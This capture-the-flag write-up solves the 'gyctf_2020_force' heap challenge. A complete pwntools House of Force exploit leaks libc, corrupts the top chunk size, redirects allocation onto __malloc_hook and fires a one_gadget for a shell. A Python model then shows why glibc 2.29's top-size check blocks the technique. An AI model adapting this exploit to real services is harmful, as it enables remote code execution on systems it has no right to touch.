gyctf_2020_force | House of force
阿新 • Published: 2020-12-14
House of Force is one of the easier heap exploitation techniques to understand. This challenge is essentially a bare HOF, but because of all sorts of mistakes it took me two whole nights to get it working. I'm exhausted and have somewhat lost confidence in continuing to learn pwn, but I'll write it down anyway.
EXP
The libc used here is my local copy with a symbol table.

from pwn import *

libc_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so'
ld_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so'
elf_path = './gyctf_2020_force'

# r = process([ld_path, elf_path], env={"LD_PRELOAD": libc_path})
r = remote('node3.buuoj.cn', 29681)
context.log_level = 'debug'
elf = ELF(elf_path)
libc = ELF(libc_path)

# one_gadget offsets for this libc-2.23 build
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]


def add(size, content):
    # menu option 1: malloc(size), print the chunk address, then read content into it
    r.sendlineafter('2:puts', '1')
    r.sendlineafter('size', str(size))
    r.recvuntil('bin addr ')
    addr = int(r.recvuntil('\n')[:-1], 16)
    r.sendlineafter('content', content)
    return addr


def show(idx):
    # menu option 2 (unused in this exploit)
    r.sendlineafter('2:puts', '2')


def debug():
    gdb.attach(r)
    pause()


# A very large request is served by mmap, which lands at a fixed offset from libc,
# so the printed address leaks libc_base.
addr = add(1000000, b'aaaa')
success('malloc addr -> ' + hex(addr))
pay = b'a' * 0x10 + p64(0) + p64(999999999999)  # unused: overwritten by the payload below
libc_base = addr - 0x6fa010
realloc = libc_base + libc.symbols['__libc_realloc']
success('addr - >' + hex(realloc))
success('libc_base ->' + hex(libc_base))

# The 0x18 request goes to the brk heap; the overflow rewrites the top chunk's
# size field with 0xffffffffffffffff. The returned pointer + 0x10 is the top chunk header.
pay = b'a' * 0x10 + p64(0) + p64(0xffffffffffffffff)
top_chunk = add(0x18, pay) + 0x10
success('top chunk -> ' + hex(top_chunk))

# Request exactly enough to move the top chunk to __malloc_hook - 0x20, so the next
# 0x20-byte chunk's user data starts at __malloc_hook - 0x10.
target = libc_base + libc.symbols['__malloc_hook'] - top_chunk - 0x33
pay = p64(0) + p64(libc_base + gadget[1]) + p64(realloc + 0x10)
add(target, b'a' * 0x8)
# writes: __realloc_hook = one_gadget, __malloc_hook = realloc + 0x10
add(0x10, pay)

# Trigger malloc -> __malloc_hook -> realloc+0x10 -> __realloc_hook -> one_gadget
r.sendlineafter('2:puts\n', '1')
r.sendlineafter('size\n', str(0x40))
r.interactive()
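To make the top-chunk arithmetic behind the script above concrete, and to show why it stops working on newer glibc, here is a small Python model of the `use_top` path of `_int_malloc`. This is an added example and not code from the original post or from glibc; all addresses are constructed, and `malloc_hook` stands for the leaked `__malloc_hook` address. With `check_top_size=False` it behaves like glibc 2.23 and the second request lands at `__malloc_hook - 0x10`, exactly where the exploit writes its payload. With `check_top_size=True` it adds the `malloc(): corrupted top size` check that glibc 2.29 introduced, which compares the top chunk's size field against `av->system_mem` and aborts on the overwritten value.

```python
# Added example (not from the original post): a model of glibc's top-chunk
# bookkeeping, with and without the glibc 2.29 "corrupted top size" check.

SIZE_SZ = 8                          # sizeof(INTERNAL_SIZE_T) on x86-64
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1  # chunks are 16-byte aligned
MINSIZE = 4 * SIZE_SZ                # smallest chunk: 0x20
MASK64 = (1 << 64) - 1               # C unsigned long wraps modulo 2**64


def request2size(req):
    """glibc's request2size(): add room for the size field, round up to 16."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return ((req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) & MASK64


class Arena:
    """Only the fields the use_top path of _int_malloc needs."""

    def __init__(self, top, top_size, system_mem):
        self.top = top                # address of the top chunk header
        self.top_size = top_size      # its size field with the flag bits cleared
        self.system_mem = system_mem  # bytes this arena obtained from the system


def malloc_from_top(av, req, check_top_size):
    """Carve a chunk off the top chunk and return the user pointer.

    check_top_size=False mirrors glibc 2.23 (the writeup's target).
    check_top_size=True adds the sanity check glibc 2.29 put in front of
    the carve: a top size larger than system_mem cannot be legitimate.
    """
    nb = request2size(req)
    if check_top_size and av.top_size > av.system_mem:
        raise ValueError("malloc(): corrupted top size")
    if av.top_size < ((nb + MINSIZE) & MASK64):
        raise MemoryError("top too small: glibc would call sysmalloc instead")
    victim = av.top
    av.top = (av.top + nb) & MASK64
    av.top_size = (av.top_size - nb) & MASK64
    return (victim + 2 * SIZE_SZ) & MASK64   # chunk2mem(): skip the 16-byte header


def hof_walkthrough(check_top_size):
    """Replay the writeup's two requests on constructed addresses.

    Returns the user pointer of the second chunk, or the allocator's
    error message when the top-size check rejects the first request.
    """
    # Constructed layout: non-PIE heap below a libc mapped near 0x7ffff7...
    top = 0x603030                  # top chunk header after the 0x18 request
    malloc_hook = 0x7ffff7dd1b10    # constructed stand-in for __malloc_hook
    av = Arena(top=top, top_size=0x20fd0, system_mem=0x21000)
    av.top_size = 0xffffffffffffffff             # the overflowed size field
    distance = malloc_hook - av.top - 0x33       # same formula as `target` in the script
    try:
        malloc_from_top(av, distance, check_top_size)   # moves top to hook - 0x20
        return malloc_from_top(av, 0x10, check_top_size)  # 0x20 chunk at hook - 0x10
    except ValueError as err:
        return str(err)


if __name__ == "__main__":
    print("glibc 2.23 model: second chunk at", hex(hof_walkthrough(False)))
    print("glibc 2.29 model:", hof_walkthrough(True))
```

The `- 0x33` in the request size works because `request2size` rounds `malloc_hook - top - 0x33` up to `malloc_hook - top - 0x20`, so the new top header lands 0x20 bytes before the hook and the following 0x20-byte chunk's user data starts 0x10 before it. The 2.29 check defeats this at the first carve: no arena ever has a top chunk larger than the memory it was given, so `0xffffffffffffffff > system_mem` is an unambiguous corruption signal.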